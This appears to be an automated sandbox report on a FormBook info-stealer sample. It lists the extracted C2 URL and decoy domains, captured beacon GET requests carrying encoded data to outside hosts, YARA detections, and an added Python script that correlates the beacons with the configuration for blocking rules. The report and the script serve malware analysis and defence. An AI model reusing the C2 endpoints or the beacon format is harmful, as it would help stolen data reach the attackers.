{"C2 list": ["www.simpeltattofor.men/mjyv/"], "decoy": ["wenyuexuan.com", "tropicaldepression.info", "healthylifefit.com", "reemletenleafy.com", "jmrrve.com", "mabduh.com", "esomvw.com", "selfcaresereneneness.com", "murdabudz.com", "meinemail.online", "brandqrcodes.com", "live-in-pflege.com", "nickrecovery.com", "ziototoristorante.com", "chatcure.com", "corlora.com", "localagentlab.com", "yogo7.net", "krveop.com", "heianswer.xyz", "idproslot.xyz", "anielleharris.com", "lebonaharchitects.com", "chilestew.com", "ventasdecasasylotes.xyz", "welcome-sber.store", "ahmedintisher.com", "pastlinks.com", "productprinting.online", "babybox.media", "volteraenergy.net", "chinatowndeliver.com", "behiscalm.com", "totalselfconfidence.net", "single-on-purpose.com", "miyonbuilding.com", "medicalmanagementinc.info", "bellaalubo.com", "dubaibiologicdentist.com", "jspagnier-graveur.com", "deskbk.com", "thehauntdepot.com", "5fbuy.com", "calmingscience.com", "luvnecklace.com", "noun-bug.com", "mysenarai.com", "socialmediaplugin.com", "livinglovinglincoln.com", "vaxfreeschool.com", "bjjinmei.com", "p60p.com", "upgradepklohb.xyz", "georges-lego.com", "lkkogltoyof4.xyz", "fryhealty.com", "peacetransformationpath.com", "lightfootsteps.com", "recreativemysteriousgift.com", "luminoza.website", "mccorklehometeam.com", "car-insurance-rates-x2.info", "serpasboutiquedecarnes.com", "1971event.com"]}
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.simpeltattofor.men/mjyv/"], "decoy": ["wenyuexuan.com", "tropicaldepression.info", "healthylifefit.com", "reemletenleafy.com", "jmrrve.com", "mabduh.com", "esomvw.com", "selfcaresereneneness.com", "murdabudz.com", "meinemail.online", "brandqrcodes.com", "live-in-pflege.com", "nickrecovery.com", "ziototoristorante.com", "chatcure.com", "corlora.com", "localagentlab.com", "yogo7.net", "krveop.com", "heianswer.xyz", "idproslot.xyz", "anielleharris.com", "lebonaharchitects.com", "chilestew.com", "ventasdecasasylotes.xyz", "welcome-sber.store", "ahmedintisher.com", "pastlinks.com", "productprinting.online", "babybox.media", "volteraenergy.net", "chinatowndeliver.com", "behiscalm.com", "totalselfconfidence.net", "single-on-purpose.com", "miyonbuilding.com", "medicalmanagementinc.info", "bellaalubo.com", "dubaibiologicdentist.com", "jspagnier-graveur.com", "deskbk.com", "thehauntdepot.com", "5fbuy.com", "calmingscience.com", "luvnecklace.com", "noun-bug.com", "mysenarai.com", "socialmediaplugin.com", "livinglovinglincoln.com", "vaxfreeschool.com", "bjjinmei.com", "p60p.com", "upgradepklohb.xyz", "georges-lego.com", "lkkogltoyof4.xyz", "fryhealty.com", "peacetransformationpath.com", "lightfootsteps.com", "recreativemysteriousgift.com", "luminoza.website", "mccorklehometeam.com", "car-insurance-rates-x2.info", "serpasboutiquedecarnes.com", "1971event.com"]} |
Source: Yara match | File source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY |
Source: C:\Windows\explorer.exe | Network Connect: 108.179.246.105 80 |
Source: C:\Windows\explorer.exe | Domain query: www.corlora.com |
Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80 |
Source: C:\Windows\explorer.exe | Domain query: www.thehauntdepot.com |
Source: C:\Windows\explorer.exe | Domain query: www.bellaalubo.com |
Source: C:\Windows\explorer.exe | Domain query: www.pastlinks.com |
Source: C:\Windows\explorer.exe | Network Connect: 35.246.6.109 80 |
Source: C:\Windows\explorer.exe | Network Connect: 54.85.93.188 80 |
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80 |
Source: C:\Windows\explorer.exe | Domain query: www.jspagnier-graveur.com |
Source: C:\Windows\explorer.exe | Domain query: www.behiscalm.com |
Source: C:\Windows\explorer.exe | Domain query: www.productprinting.online |
Source: C:\Windows\explorer.exe | Domain query: www.miyonbuilding.com |
Source: global traffic | HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=L63r4gynR7T+uFffjQ1lMOoDpS8QK6GZHdtzK1OvDTkBgsUpz0OkUj6/3F+1gpc5iCodVhQ8Dw== HTTP/1.1 | Host: www.bellaalubo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /mjyv/?0pK81=K9FJa1rwSUAAa7/ViuRfbodFPMpyTpIbchforJThhUgcBsFNcj++iNtzjC9b847wWXILaTLWiQ==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1 | Host: www.behiscalm.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=dI0EVfu3O8PRZHJYFiskZOhLU8OYvItQe6Md7KpFhlubQ63bIpFTgfxbi1sf92w0hSX5JIFUxQ== HTTP/1.1 | Host: www.productprinting.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=FJb0UZ01VWieyk9Q9MfOW6tWVMxtPQ65AKmCznKsSr2tdhgz0LXvq/VY7gtgl/S7OsM4m26iBg== HTTP/1.1 | Host: www.corlora.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /mjyv/?0pK81=Th83CkuYiZ3yTy/NQYNDjmtPTEXY1rwCFz+4Jmb9PkUSuL5FI8psFzofsp4HlXm5aEcRz/p5bA==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1 | Host: www.jspagnier-graveur.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /mjyv/?0pK81=XUhyKAoPsp+sS+2wc1lVw6UQrcGLXYJeNJI1ueZmTZNqKWlflngblX9CeHA9F+AScG6M63wGOw==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1 | Host: www.chinatowndeliver.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: |
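The six GETs above all carry the path /mjyv/ from the extracted C2 entry but go to hosts from the decoy list, and the configured C2 host www.simpeltattofor.men appears in none of them. The following is an added example written for this report, not Joe Sandbox code: it reassembles the flattened requests, checks each Host against the extracted C2 and decoy lists, and works out which parts of the beacon stay fixed across hosts. The trimmed decoy subset, the www.-stripping rule and the constant/varying parameter heuristic are this example's own assumptions.

```python
"""Correlate the FormBook configuration extracted above with the HTTP beacons
the sandbox captured. Added example for this report, not Joe Sandbox code:
the config entries and request targets are copied from the report; the
request reassembly, parsing and stable-indicator heuristic are this
example's own."""
from collections import defaultdict
from urllib.parse import urlsplit

# From the "Malware Configuration Extractor" line above. Only the decoy
# domains that appear in the network section (plus one unused one) are
# repeated here; the report carries the full list.
CONFIG = {
    "C2 list": ["www.simpeltattofor.men/mjyv/"],
    "decoy": ["corlora.com", "thehauntdepot.com", "bellaalubo.com",
              "pastlinks.com", "jspagnier-graveur.com", "behiscalm.com",
              "productprinting.online", "miyonbuilding.com",
              "chinatowndeliver.com", "wenyuexuan.com"],
}

# (Host header, request target) of the six captured GETs, copied verbatim.
CAPTURED = [
    ("www.bellaalubo.com",
     "/mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=L63r4gynR7T+uFffjQ1lMOoDpS8QK6GZHdtzK1OvDTkBgsUpz0OkUj6/3F+1gpc5iCodVhQ8Dw=="),
    ("www.behiscalm.com",
     "/mjyv/?0pK81=K9FJa1rwSUAAa7/ViuRfbodFPMpyTpIbchforJThhUgcBsFNcj++iNtzjC9b847wWXILaTLWiQ==&A6AlK=e0GlzbR8AB8XET3"),
    ("www.productprinting.online",
     "/mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=dI0EVfu3O8PRZHJYFiskZOhLU8OYvItQe6Md7KpFhlubQ63bIpFTgfxbi1sf92w0hSX5JIFUxQ=="),
    ("www.corlora.com",
     "/mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=FJb0UZ01VWieyk9Q9MfOW6tWVMxtPQ65AKmCznKsSr2tdhgz0LXvq/VY7gtgl/S7OsM4m26iBg=="),
    ("www.jspagnier-graveur.com",
     "/mjyv/?0pK81=Th83CkuYiZ3yTy/NQYNDjmtPTEXY1rwCFz+4Jmb9PkUSuL5FI8psFzofsp4HlXm5aEcRz/p5bA==&A6AlK=e0GlzbR8AB8XET3"),
    ("www.chinatowndeliver.com",
     "/mjyv/?0pK81=XUhyKAoPsp+sS+2wc1lVw6UQrcGLXYJeNJI1ueZmTZNqKWlflngblX9CeHA9F+AScG6M63wGOw==&A6AlK=e0GlzbR8AB8XET3"),
]


def reassemble(host, target):
    """Rebuild the request as it went on the wire; the report flattened the
    CRLFs between the request line, Host and Connection headers."""
    return f"GET {target} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"


def parse_request(raw):
    """Minimal HTTP/1.1 request parser: method, host, path and the query as an
    ordered list of (key, value). The query is split by hand because
    parse_qs() would turn the '+' inside the values into a space."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    query = []
    for pair in filter(None, parts.query.split("&")):
        key, _, value = pair.partition("=")
        query.append((key, value))
    return {"method": method, "host": headers.get("host", ""),
            "path": parts.path, "query": query}


def c2_endpoints(config):
    """Split each 'host/path/' C2 entry into (host, path)."""
    out = []
    for entry in config["C2 list"]:
        host, _, path = entry.partition("/")
        out.append((host, "/" + path))
    return out


def classify_host(host, config):
    """c2 if the Host matches a configured C2; decoy if it is a configured
    decoy (listed without the www. label the sample actually queries, an
    assumption taken from the Domain query lines); unknown otherwise."""
    if host in {h for h, _ in c2_endpoints(config)}:
        return "c2"
    bare = host[4:] if host.startswith("www.") else host
    return "decoy" if bare in config["decoy"] else "unknown"


def triage(captured, config):
    """One (host, label, path_matches_c2_path) row per captured request."""
    c2_paths = {path for _, path in c2_endpoints(config)}
    rows = []
    for host, target in captured:
        req = parse_request(reassemble(host, target))
        rows.append((req["host"], classify_host(req["host"], config),
                     req["path"] in c2_paths))
    return rows


def stable_indicators(captured):
    """What stays fixed across beacons regardless of receiving host: the set
    of paths, the parameters whose value never changes, and the parameters
    that change per request. Parameter order is ignored, since the sample
    emits the two keys in either order."""
    values, paths = defaultdict(set), set()
    for host, target in captured:
        req = parse_request(reassemble(host, target))
        paths.add(req["path"])
        for key, value in req["query"]:
            values[key].add(value)
    constant = {k: next(iter(v)) for k, v in values.items() if len(v) == 1}
    varying = {k for k, v in values.items() if len(v) > 1}
    return paths, constant, varying


if __name__ == "__main__":
    for host, label, path_ok in triage(CAPTURED, CONFIG):
        print(f"{host:32} {label:8} c2-path={path_ok}")
    print(stable_indicators(CAPTURED))
```

Across the six requests only the path, the two parameter names and the value of A6AlK are fixed; 0pK81 changes every time and the Host rotates through the decoy list. A block list built from the hosts in this capture would therefore cover a handful of decoys and miss the configured C2, whereas a proxy rule on path plus parameter key set matches every beacon. The Network Connect lines show the beacons were sent by explorer.exe rather than by the sample's own process, so an egress rule keyed on process name is equally unhelpful here.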
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp | String found in binary or memory: http://c.statcounter.com/9484561/0/b0cbab70/1/ |
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp | String found in binary or memory: http://statcounter.com/ |
Source: explorer.exe, 00000005.00000000.391155069.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J |
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp | String found in binary or memory: https://www.namebrightstatic.com/images/bg.png) |
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp | String found in binary or memory: https://www.namebrightstatic.com/images/error_board.png) |
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp | String found in binary or memory: https://www.namebrightstatic.com/images/header_bg.png) |
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp | String found in binary or memory: https://www.namebrightstatic.com/images/logo_off.gif) |
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp | String found in binary or memory: https://www.namebrightstatic.com/images/site_maintenance.png) |
Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_008E275D |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_01792060 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_01796080 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_017947A0 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_01796620 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_01792A48 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_01797080 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_017954E8 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_017919D0 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_017941A8 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_01794E00 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_0179B1E8 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_01793040 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_0179B808 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_01793BC0 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_00911D21 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_008E6458 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_00401030 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_0041C970 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_0041B9BF |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_0041D294 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_0041CBD1 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_00408C80 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_0041CC9E |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_00402D88 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_00402D90 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_00402FB0 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_008E275D |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_00911D21 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_008E6458 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05220D20 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05244120 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0522F900 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052F2D07 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052F1D55 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05252581 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0523D5E0 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052E1002 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0523841F |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052520A0 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052F20A8 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0523B090 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052F2B28 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0525EBB0 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052F1FF1 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05246E30 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052F22AE |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052F2EF7 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DDB9BF |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DDC970 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DDD294 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DDCBD1 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DDCC9E |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DC8C80 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DC2D90 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DC2D88 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DC2FB0 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_004185E0 NtCreateFile, |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_00418690 NtReadFile, |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_00418710 NtClose, |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_004187C0 NtAllocateVirtualMemory, |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_004185DA NtCreateFile, |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_0041868A NtReadFile, |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_0041868C NtReadFile, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269910 NtAdjustPrivilegesToken,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269540 NtReadFile,LdrInitializeThunk, |
